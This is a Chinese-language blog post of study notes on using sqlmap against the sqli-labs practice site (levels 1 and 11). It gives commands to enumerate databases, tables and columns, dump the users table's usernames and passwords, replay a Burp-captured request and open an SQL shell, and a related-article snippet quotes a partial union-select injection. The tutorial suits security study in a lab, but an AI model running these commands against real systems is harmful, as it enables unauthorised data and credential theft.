sqli笔记四

于 2020-07-16 20:34:29 发布
阅读量70 收藏
点赞数
分类专栏: 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gbxiaowang/article/details/107391226
版权

sqlmap使用
试验靶场,sqli-labs第一关

sqlmap -u http://**** -p id

在这里插入图片描述

sqlmap -u http://***** --dbs --dbms mysql

查询数据库,–dbms是指定数据库类型,不加也可以。
在这里插入图片描述

sqlmap -u *** -D security --tables

查询表名
在这里插入图片描述

sqlmap -u *** -D security -T users --columns

列名
在这里插入图片描述

这里是引用
sqlmap -u *** -D security -T users -C “username,password” --dump

dump就是列出指定数据库的表的列的数据,还可写成

–dump -T""-D""-C""

在这里插入图片描述

--current-user 当前用户
--current-db当前数据库
--users当前数据库里所有的用户
--privileges查看用户权限
-U root --privileges 查看只和root相关的权限

通用技巧:
试验靶场 sqli第十一关

  • burpsuite抓包
    copy下抓下来的数据,新建一个文档,放在主文件夹下,假设命名为aaa
  • sqlmap -r aaa
    在这里插入图片描述
    uname是可以被注入的
  • sqlmap -r aaa --dbs 数据库名称
  • sqlmap -r aaa -D security -tables
  • 后面都是一样的。只是将信息都封进了aaa文件中。
    交互成功的话,还可以拿sqlshell
  • sqlmap -r aaa --sql-shell
    然后就可以执行sql语句查询数据表了
    在这里插入图片描述
  • quit退出sqlshell
Thuranna
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
安装sqli-labs
10-22
4. 启动apache和数据库 启动Apache和MySQL数据库,以便提供Web服务和数据库支持。 5. 访问http://localhost/文件夹名字 访问http://localhost/文件夹名字,以便访问sqli-labs靶场环境。 6. 初始化数据库 初始化...
sqli-bypass靶场
11-10
4. **时间盲注**:如果系统对查询进行了限制或过滤,时间盲注允许攻击者通过检查查询的执行时间来判断条件是否为真,而非直接获取结果。 5. **布尔盲注**:类似于时间盲注,但根据查询结果是否改变页面内容来进行...
sqli-labs.rar
07-06
4. **堆叠查询注入(Stacked Queries Injection)**:在单个请求中执行多个SQL语句,例如通过在URL参数中使用`AND`或`OR`。 5. **错误回显注入(Error-Based Injection)**:利用系统返回的错误信息来获取关于...
html css js网页设计
07-12
HTML、CSS和JavaScript是构建网页和网站的基本技术,它们共同工作来创建和设计用户界面。下面是关于这三种技术的详细介绍: ### HTML (HyperText Markup Language) - **定义**:HTML是构建网页内容的标准标记语言。 - **作用**:用于创建网页的结构和内容,如段落、链接、图片、表格等。 - **语法**:使用标签(如 `<p>`, `<div>`, `<a>`, `<img>` 等)来定义网页元素。 ### CSS (Cascading Style Sheets) - **定义**:CSS是一种样式表语言,用于描述HTML文档的呈现方式。 - **作用**:用于设置网页的布局、颜色、字体和其他视觉元素。 - **语法**:通过选择器(如 `p`, `.myclass`, `#myid` 等)应用样式规则。 ### JavaScript - **定义**:JavaScript是一种脚本语言,通常用于网页上实现交互功能。 - **作用**:允许网页与用户进行交互,如响应用户操作、动态更新内容、动画效果等。 - **语法**:Java
2023年数字乡村建设解决方案PPT(34页).pptx
07-12
数字乡村建设解决方案旨在通过数字化转型促进乡村振兴和农业农村现代化。该方案强调了数字乡村建设的战略机遇,以"1+3+5"工程为总体框架,即一个大数据中心、三大服务平台和五类主题应用。方案着重于乡村治理、产业发展和公共服务三大问题,通过完善治理体系、升级治理能力、强化产业链条和改善资源配置来推动乡村全面振兴。 方案中提出的数字乡村大数据中心是信息资源的集散地,依托大数据、AI、物联网等新技术,实现数据驱动的决策支持。三大服务平台包括产业服务、民生服务和治理服务,旨在提升农业生产智能化、经营网络化,同时优化乡村治理结构和提升服务效能。五类主题应用覆盖生产管理、流通营销、行业监管、公共服务和乡村治理,通过具体业务应用体系,实现农业全产业链的数字化管理和服务。 预期建设效益包括通过信息技术促进乡村优势产业发展,形成城郊融合型数字乡村治理新模式,以及创新服务方式,提升服务能力,保障农民权益。整体而言,该方案以数字化为手段,推动乡村经济、治理、文化等多方面的全面升级和发展。
脉冲强光技术在灭菌烧结固化应用解决方案
07-12
脉冲强光技术在灭菌烧结固化应用解决方案,已经得到厂家授权,可以对外公示。
2024年欧洲辣椒素市场主要企业市场占有率及排名.docx
07-12
2024年欧洲辣椒素市场主要企业市场占有率及排名.docx
1ewqeqweqweqweq
07-12
1ewqeqweqweqweq
DS18B20资源useless,don‘t download
07-12
DS18B20资源useless,don‘t download
Go语言实现冒泡、快排及堆排序.docx
07-12
Go语言实现冒泡、快排及堆排序.docx Go语言实现冒泡、快排及堆排序.docx Go语言实现冒泡、快排及堆排序.docx Go语言实现冒泡、快排及堆排序.docx
[OGSM]认识年度经营计划管理.pptx
07-12
[OGSM]认识年度经营计划管理.pptx
哈尔滨理工大学考研15个学院,71个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总
07-12
哈尔滨理工大学考研15个学院,71个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总
http简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp
07-12
httphttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析.txthttp简介及应用实例及实例分析
OGSM快速落地双份材料.pptx
最新发布
07-12
OGSM快速落地双份材料.pptx
爬虫项目资源useless,don‘t download
07-12
爬虫项目资源useless,don‘t download
Web应用 - A Guide to Securing Modern Web Application
07-12
1 SECURITY IN THE WORLD OF WEB APPLICATIONS 1 Information Security in a Nutshell 1 Flirting with Formal Solutions 2 Enter Risk Management4 Enlightenment Through Taxonomy 6 Toward Practical Approaches 7 A Brief History of the Web 8 Tales of the Stone Age: 1945 to 1994 8 The First Browser Wars: 1995 to 1999 10 The Boring Period: 2000 to 2003 11 Web 2.0 and the Second Browser Wars: 2004 and Beyond 12 The Evolution of a Threat 14 The User as a Security Flaw14 The Cloud, or the Joys of Communal L
作业2:插值与拟合.pdf
07-12
作业2:插值与拟合.pdf
sqli-labs第4关
09-20
sqli-labs第4关的目标是获取数据库表中的数据。该关卡可以通过以下步骤完成: 1. 首先,你需要找到有关表名和列名的信息。你可以使用注入语句"?id=-1") union select 1,2,group_concat(hex(column_name)) from ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值